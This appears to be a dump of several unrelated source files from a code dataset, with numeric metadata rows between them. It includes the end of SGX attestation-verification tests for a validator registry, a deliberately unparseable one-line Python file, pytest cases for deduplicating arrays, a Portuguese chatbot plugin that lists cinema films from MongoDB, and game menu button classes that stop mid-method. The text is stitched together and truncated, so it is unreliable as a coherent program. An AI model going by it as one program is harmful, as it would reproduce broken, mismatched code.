verification_report["isvEnclaveQuoteStatus"] = "Bad"
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# No isvEnclaveQuoteBody
verification_report = \
json.loads(proof_data_dict["verification_report"])
verification_report["isvEnclaveQuoteStatus"] = enclave_status
verification_report['isvEnclaveQuoteBody'] = None
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Malformed isvEnclaveQuoteBody (decode the enclave quote, chop off
# the last byte, and re-encode)
verification_report = \
json.loads(proof_data_dict["verification_report"])
verification_report['isvEnclaveQuoteBody'] = \
base64.b64encode(
base64.b64decode(
verification_report['isvEnclaveQuoteBody'].encode())[1:])\
.decode()
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Invalid basename
verification_report = \
json.loads(proof_data_dict["verification_report"])
sgx_quote = sgx_structs.SgxQuote()
sgx_quote.parse_from_bytes(
base64.b64decode(
verification_report['isvEnclaveQuoteBody'].encode()))
sgx_quote.basename.name = \
b'\xCC' * sgx_structs.SgxBasename.STRUCT_SIZE
verification_report['isvEnclaveQuoteBody'] = \
base64.b64encode(sgx_quote.serialize_to_bytes()).decode()
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Report data is not valid (bad OPK hash)
verification_report = \
json.loads(proof_data_dict["verification_report"])
sgx_quote = sgx_structs.SgxQuote()
sgx_quote.parse_from_bytes(
base64.b64decode(
verification_report['isvEnclaveQuoteBody'].encode()))
hash_input = \
'{0}{1}'.format(
'Not a valid OPK Hash',
self.factory.poet_public_key).upper().encode()
sgx_quote.report_body.report_data.d = \
hashlib.sha256(hash_input).digest()
verification_report['isvEnclaveQuoteBody'] = \
base64.b64encode(sgx_quote.serialize_to_bytes()).decode()
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Report data is not valid (bad PPK)
verification_report = \
json.loads(proof_data_dict["verification_report"])
sgx_quote = sgx_structs.SgxQuote()
sgx_quote.parse_from_bytes(
base64.b64decode(
verification_report['isvEnclaveQuoteBody'].encode()))
hash_input = \
'{0}{1}'.format(
self.factory.pubkey_hash,
"Not a valid PPK").encode()
sgx_quote.report_body.report_data.d = \
hashlib.sha256(hash_input).digest()
verification_report['isvEnclaveQuoteBody'] = \
base64.b64encode(sgx_quote.serialize_to_bytes()).decode()
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Invalid enclave measurement
verification_report = \
json.loads(proof_data_dict["verification_report"])
sgx_quote = sgx_structs.SgxQuote()
sgx_quote.parse_from_bytes(
base64.b64decode(
verification_report['isvEnclaveQuoteBody'].encode()))
sgx_quote.report_body.mr_enclave.m = \
b'\xCC' * sgx_structs.SgxMeasurement.STRUCT_SIZE
verification_report['isvEnclaveQuoteBody'] = \
base64.b64encode(sgx_quote.serialize_to_bytes()).decode()
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
def test_missing_report_key_pem(self):
"""
Testing validator registry unable to retrieve the report public key
PEM from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with empty report key PEM
self.validator.respond(
self.factory.create_get_response_report_key_pem(),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
def test_invalid_report_key_pem(self):
"""
Testing validator registry unable to succcessfully parse the report
public key PEM from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with empty report key PEM
self.validator.respond(
self.factory.create_get_response_report_key_pem(pem='invalid'),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
def test_missing_enclave_measurements(self):
"""
Testing validator registry unable to retrieve the valid enclave
measurements from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with the simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with empty valid enclave measurements
self.validator.respond(
self.factory.create_get_response_enclave_measurements(),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
def test_invalid_enclave_measurements(self):
"""
Testing validator registry unable to successfully parse the valid
enclave measurements from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with the simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with invalid valid enclave measurements
self.validator.respond(
self.factory.create_get_response_enclave_measurements(
measurements='invalid'),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
def test_missing_enclave_basenames(self):
"""
Testing validator registry unable to retrieve the valid enclave
basenames from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with the simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with simulator valid enclave measurements
self.validator.respond(
self.factory.create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with empty enclave basenames
self.validator.respond(
self.factory.create_get_response_enclave_basenames(),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
def test_invalid_enclave_basenames(self):
"""
Testing validator registry unable to successfully parse the valid
enclave basenames from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with the simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with simulator valid enclave measurements
self.validator.respond(
self.factory.create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with empty enclave basenames
self.validator.respond(
self.factory.create_get_response_enclave_basenames(
basenames='invalid'),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
| 37.748031
| 80
| 0.632696
| 3,477
| 33,558
| 5.81277
| 0.069313
| 0.071842
| 0.088318
| 0.053436
| 0.869428
| 0.857355
| 0.843303
| 0.838454
| 0.832665
| 0.810252
| 0
| 0.00988
| 0.26408
| 33,558
| 888
| 81
| 37.790541
| 0.808512
| 0.229275
| 0
| 0.809237
| 0
| 0
| 0.059488
| 0.01031
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034137
| false
| 0
| 0.014056
| 0
| 0.050201
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7551d7e4e686681f6b2c1bf5241243c3eba8acd
| 12
|
py
|
Python
|
examples/Tests/Action/Python/file_parse_error.py
|
esayui/mworks
|
0522e5afc1e30fdbf1e67cedd196ee50f7924499
|
[
"MIT"
] | null | null | null |
examples/Tests/Action/Python/file_parse_error.py
|
esayui/mworks
|
0522e5afc1e30fdbf1e67cedd196ee50f7924499
|
[
"MIT"
] | null | null | null |
examples/Tests/Action/Python/file_parse_error.py
|
esayui/mworks
|
0522e5afc1e30fdbf1e67cedd196ee50f7924499
|
[
"MIT"
] | null | null | null |
y = 1 - * 2
| 6
| 11
| 0.25
| 3
| 12
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0.5
| 12
| 1
| 12
| 12
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7636d7f00af992d470b5935badc5bd779a0a79a
| 1,187
|
py
|
Python
|
0026_RemoveDuplicatesFromSortedArray/python/test_solution.py
|
jeffvswanson/LeetCode
|
6bc7d6cad3c2b1bd6ccb2616ec081fb5eb51ccc8
|
[
"MIT"
] | null | null | null |
0026_RemoveDuplicatesFromSortedArray/python/test_solution.py
|
jeffvswanson/LeetCode
|
6bc7d6cad3c2b1bd6ccb2616ec081fb5eb51ccc8
|
[
"MIT"
] | null | null | null |
0026_RemoveDuplicatesFromSortedArray/python/test_solution.py
|
jeffvswanson/LeetCode
|
6bc7d6cad3c2b1bd6ccb2616ec081fb5eb51ccc8
|
[
"MIT"
] | null | null | null |
import pytest
import solution
@pytest.mark.parametrize(
"nums,expected_list,expected_k",
[
([1, 1, 2], [1, 2, 0], 2),
([0, 0, 1, 1, 1, 2, 2, 3, 3, 4], [0, 1, 2, 3, 4, 0, 0, 0, 0, 0], 5),
([], [], 0),
([1], [1], 1),
([1, 1], [1, 1], 1),
([1, 2], [1, 2], 2),
([1, 1, 1], [1, 1, 1], 1),
([-1, 0, 0, 0, 0, 3, 3], [-1, 0, 3], 3),
],
)
def test_initial_pass(nums, expected_list, expected_k):
got = solution.initial_pass(nums)
assert got == expected_k
for i in range(expected_k):
assert nums[i] == expected_list[i]
@pytest.mark.parametrize(
"nums,expected_list,expected_k",
[
([1, 1, 2], [1, 2, 0], 2),
([0, 0, 1, 1, 1, 2, 2, 3, 3, 4], [0, 1, 2, 3, 4, 0, 0, 0, 0, 0], 5),
([], [], 0),
([1], [1], 1),
([1, 1], [1, 1], 1),
([1, 2], [1, 2], 2),
([1, 1, 1], [1, 1, 1], 1),
([-1, 0, 0, 0, 0, 3, 3], [-1, 0, 3], 3),
],
)
def test_iterative_pass(nums, expected_list, expected_k):
got = solution.iterative_pass(nums)
assert got == expected_k
for i in range(expected_k):
assert nums[i] == expected_list[i]
| 26.977273
| 76
| 0.441449
| 200
| 1,187
| 2.52
| 0.13
| 0.142857
| 0.166667
| 0.174603
| 0.884921
| 0.884921
| 0.884921
| 0.884921
| 0.72619
| 0.72619
| 0
| 0.14742
| 0.314238
| 1,187
| 43
| 77
| 27.604651
| 0.471744
| 0
| 0
| 0.736842
| 0
| 0
| 0.048863
| 0.048863
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.052632
| false
| 0.105263
| 0.052632
| 0
| 0.105263
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
a7a640026a13714ccba9b56c21e8b0eb80e58270
| 8,220
|
py
|
Python
|
filmes_bot.py
|
nananda26/pi20182
|
38a4dab5a9223d48552e0b6aeafaa389c238a412
|
[
"MIT"
] | 1
|
2018-12-05T01:14:44.000Z
|
2018-12-05T01:14:44.000Z
|
filmes_bot.py
|
nananda26/pi20182
|
38a4dab5a9223d48552e0b6aeafaa389c238a412
|
[
"MIT"
] | 1
|
2018-12-06T22:45:17.000Z
|
2018-12-06T22:45:17.000Z
|
filmes_bot.py
|
nananda26/pi20182
|
38a4dab5a9223d48552e0b6aeafaa389c238a412
|
[
"MIT"
] | null | null | null |
from errbot import BotPlugin, botcmd, botmatch
import pymongo
class FilmesBot(BotPlugin):
'Programacao de filmes'
@botcmd
def start(self, msg, args):
yield "Em qual shopping?"
yield "/Continente_Park_Shopping"
yield "/Shopping_Itaguacu"
yield "/Shopping_Via_Catarina"
yield "/Beira_Mar_Shopping"
yield "/Floripa_Shopping"
yield "/Shopping_Iguatemi"
@botcmd
def filmes(self, msg, args):
yield "Em qual shopping?"
yield "/Continente_Park_Shopping"
yield "/Shopping_Itaguacu"
yield "/Shopping_Via_Catarina"
yield "/Beira_Mar_Shopping"
yield "/Floripa_Shopping"
yield "/Shopping_Iguatemi"
@botcmd
def Continente_Park_Shopping(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/O_Grinch"
yield "/Bohemian_Rhapsody"
yield "/Parque_do_inferno"
@botcmd
def Shopping_Itaguacu(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/O_Grinch"
yield "/De_repente_uma_familia"
yield "/Parque_do_inferno"
@botcmd
def Shopping_Via_Catarina(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/O_Grinch"
yield "/Animais_Fantasticos_os_crimes_de_Grindelwald"
yield "/Bohemian_Rhapsody"
@botcmd
def Beira_Mar_Shopping(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/Sueno_Florianopolis"
yield "/Bohemian_Rhapsody"
yield "/Entrevista_com_Deus"
@botcmd
def Floripa_Shopping(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/Bohemian_Rhapsody"
yield "/Animais_Fantasticos_os_crimes_de_Grinderlwald"
yield "/O_Grinch"
@botcmd
def Shopping_Iguatemi(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/Nasce_uma_estrela"
yield "/Animais_Fantasticos_os_crimes_de_Grinderlwald"
yield "/Entrevista_com_Deus"
@botcmd
def O_Grinch(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "O Grinch"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_O_Grinch'
@botcmd
def Sinopse_O_Grinch(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "O Grinch"})
yield resultado['sinopse']
@botcmd
def Parque_do_inferno(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Parque do inferno"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Parque_do_inferno'
@botcmd
def Sinopse_Parque_do_inferno(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Parque do inferno"})
yield resultado['sinopse']
@botcmd
def De_repente_uma_familia(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "De repente uma família"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_De_repente_uma_familia'
@botcmd
def Sinopse_De_repente_uma_familia(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "De repente uma família"})
yield resultado['sinopse']
@botcmd
def Bohemian_Rhapsody(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Bohemian Rhapsody"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Bohemian_Rhapsody'
@botcmd
def Sinopse_Bohemian_Rhapsody(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Bohemian Rhapsody"})
yield resultado['sinopse']
@botcmd
def Animais_Fantasticos_os_crimes_de_Grindelwald(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Animais Fantásticos: os crimes de Grindelwald"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Animais_Fantasticos_os_crimes_de_Grindelwald'
@botcmd
def Sinopse_Animais_Fantasticos_os_crimes_de_Grindelwald(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Animais Fantásticos: os crimes de Grindelwald"})
yield resultado['Sinopse']
@botcmd
def Sueno_Florianopolis(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Sueño Florianópolis"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Sueno_Florianopolis'
@botcmd
def Sinopse_Sueno_Florianopolis(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Sueño Florianópolis"})
yield resultado['Sinopse']
@botcmd
def Entrevista_com_Deus(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Entrevista com Deus"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Entrevista_com_Deus'
@botcmd
def Sinopse_Entrevista_com_Deus(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Entrevista com Deus"})
yield resultado['Sinopse']
@botcmd
def Nasce_uma_estrela(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Nasce Uma Estrela"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Nasce_uma_estrela'
@botcmd
def Sinopse_Nasce_uma_estrela(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Nasce Uma Estrela"})
yield resultado['Sinopse']
| 38.591549
| 95
| 0.642457
| 857
| 8,220
| 5.971995
| 0.085181
| 0.042204
| 0.051583
| 0.056272
| 0.903869
| 0.853849
| 0.835092
| 0.811645
| 0.792106
| 0.792106
| 0
| 0
| 0.238443
| 8,220
| 212
| 96
| 38.773585
| 0.817572
| 0.002555
| 0
| 0.784946
| 0
| 0
| 0.290546
| 0.057428
| 0
| 0
| 0
| 0
| 0
| 1
| 0.129032
| false
| 0
| 0.010753
| 0
| 0.145161
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7ac189e00446e27a65f8001cd7e8b8b8688e313
| 12,065
|
py
|
Python
|
objects/buttons/__init__.py
|
TheLokin/Kabalayn
|
2034364e03e8eca909df11dcc393d70edd18493b
|
[
"MIT"
] | null | null | null |
objects/buttons/__init__.py
|
TheLokin/Kabalayn
|
2034364e03e8eca909df11dcc393d70edd18493b
|
[
"MIT"
] | null | null | null |
objects/buttons/__init__.py
|
TheLokin/Kabalayn
|
2034364e03e8eca909df11dcc393d70edd18493b
|
[
"MIT"
] | null | null | null |
from .button import Button
from .button_action import ButtonAction
from .button_option import ButtonOption
from scripts import LanguageManager, SoundManager, Configuration as Config
class ButtonPlay(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
Button.selected = cls.instances[scene]
return cls.instances[scene]
def __init__(self, scene):
super().__init__(114, 262, 15, 1, 'uiPlay')
def execute(self, scene):
self.snd_click.play()
scene.fade(self.execute_async, scene)
def execute_async(self, scene):
SoundManager.load_music('bgm_dialog.ogg')
scene.exec_play()
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonExit(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonMultiplayer(scene)
class ButtonMultiplayer(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(114, 326, 15, 1, 'uiMultiplayer')
def execute(self, scene):
self.snd_click.play()
scene.fade(scene.exec_multiplayer)
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonPlay(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonOptions(scene)
class ButtonOptions(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
if scene.__class__.__name__ == 'Menu':
super().__init__(114, 390, 15, 1, 'uiOptions')
elif scene.__class__.__name__ == 'Pause':
super().__init__(114, 326, 15, 1, 'uiOptions')
def execute(self, scene):
self.snd_click.play()
scene.fade(self.execute_async, scene)
def execute_async(self, scene):
Button.selected = ButtonLanguage(scene)
scene.exec_options()
def key_up(self, scene):
self.snd_choice.play()
if scene.__class__.__name__ == 'Menu':
Button.selected = ButtonMultiplayer(scene)
elif scene.__class__.__name__ == 'Pause':
Button.selected = ButtonContinue(scene)
def key_down(self, scene):
self.snd_choice.play()
if scene.__class__.__name__ == 'Menu':
Button.selected = ButtonExit(scene)
elif scene.__class__.__name__ == 'Pause':
Button.selected = ButtonQuit(scene)
class ButtonExit(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(114, 454, 15, 1, 'uiExit')
def execute(self, scene):
self.snd_click.play()
Config.save()
scene.exec_exit()
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonOptions(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonPlay(scene)
class ButtonLanguage(ButtonOption):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
options = LanguageManager.languages()
super().__init__(74, 198, 20, 1, options.index(Config.lang), options, True, 'configLanguage')
self.original = Config.lang
@classmethod
def cancel(cls, scene):
button = cls.instances[scene]
button.option = button.options.index(button.original)
LanguageManager.change_language(button.original)
@classmethod
def confirm(cls, scene):
button = cls.instances[scene]
button.original = LanguageManager.languages()[button.option]
def execute(self, scene):
self.snd_choice.play()
LanguageManager.change_language(self.options[self.option])
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonConfirm(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonMasterVolume(scene)
def update(self, delta_time):
super().update(delta_time)
self.text_secondary = LanguageManager.load_text('optionLanguage')
class ButtonMasterVolume(ButtonOption):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(74, 262, 20, 1, Config.master_volume * 10, list(range(11)), False, 'configMasterVolume')
self.original = Config.master_volume
@classmethod
def cancel(cls, scene):
button = cls.instances[scene]
button.option = int(button.original * 10)
SoundManager.set_master(button.original)
@classmethod
def confirm(cls, scene):
button = cls.instances[scene]
button.original = button.option / 10
def execute(self, scene):
self.snd_click.play()
SoundManager.set_master(self.option / 10)
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonLanguage(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonSoundVolume(scene)
def update(self, delta_time):
super().update(delta_time)
self.text_secondary = str(self.option)
class ButtonSoundVolume(ButtonOption):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(74, 326, 20, 1, Config.sound_volume * 10, list(range(11)), False, 'configSoundVolume')
self.original = Config.sound_volume
@classmethod
def cancel(cls, scene):
button = cls.instances[scene]
button.option = int(button.original * 10)
SoundManager.set_sound(button.original)
@classmethod
def confirm(cls, scene):
button = cls.instances[scene]
button.original = button.option / 10
def execute(self, scene):
self.snd_click.play()
SoundManager.set_sound(self.option / 10)
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonMasterVolume(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonMusicVolume(scene)
def update(self, delta_time):
super().update(delta_time)
self.text_secondary = str(self.option)
class ButtonMusicVolume(ButtonOption):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(74, 390, 20, 1, Config.music_volume * 10, list(range(11)), False, 'configMusicVolume')
self.original = Config.music_volume
@classmethod
def cancel(cls, scene):
button = cls.instances[scene]
button.option = int(button.original * 10)
SoundManager.set_music(button.original)
@classmethod
def confirm(cls, scene):
button = cls.instances[scene]
button.original = button.option / 10
def execute(self, scene):
self.snd_click.play()
SoundManager.set_music(self.option / 10)
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonSoundVolume(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonConfirm(scene)
def update(self, delta_time):
super().update(delta_time)
self.text_secondary = str(self.option)
class ButtonConfirm(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(50, 454, 10, 1, 'uiConfirm')
def execute(self, scene):
self.snd_click.play()
Config.save()
scene.fade(self.execute_async, scene)
def execute_async(self, scene):
ButtonLanguage.confirm(scene)
ButtonMasterVolume.confirm(scene)
ButtonSoundVolume.confirm(scene)
ButtonMusicVolume.confirm(scene)
Button.selected = ButtonOptions(scene)
scene.exec_confirm()
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonMusicVolume(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonLanguage(scene)
def key_left(self, scene):
self.snd_choice.play()
Button.selected = ButtonCancel(scene)
def key_right(self, scene):
self.snd_choice.play()
Button.selected = ButtonCancel(scene)
class ButtonCancel(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(258, 454, 10, 1, 'uiCancel')
def execute(self, scene):
self.snd_click.play()
scene.fade(self.execute_async, scene)
def execute_async(self, scene):
ButtonLanguage.cancel(scene)
ButtonMasterVolume.cancel(scene)
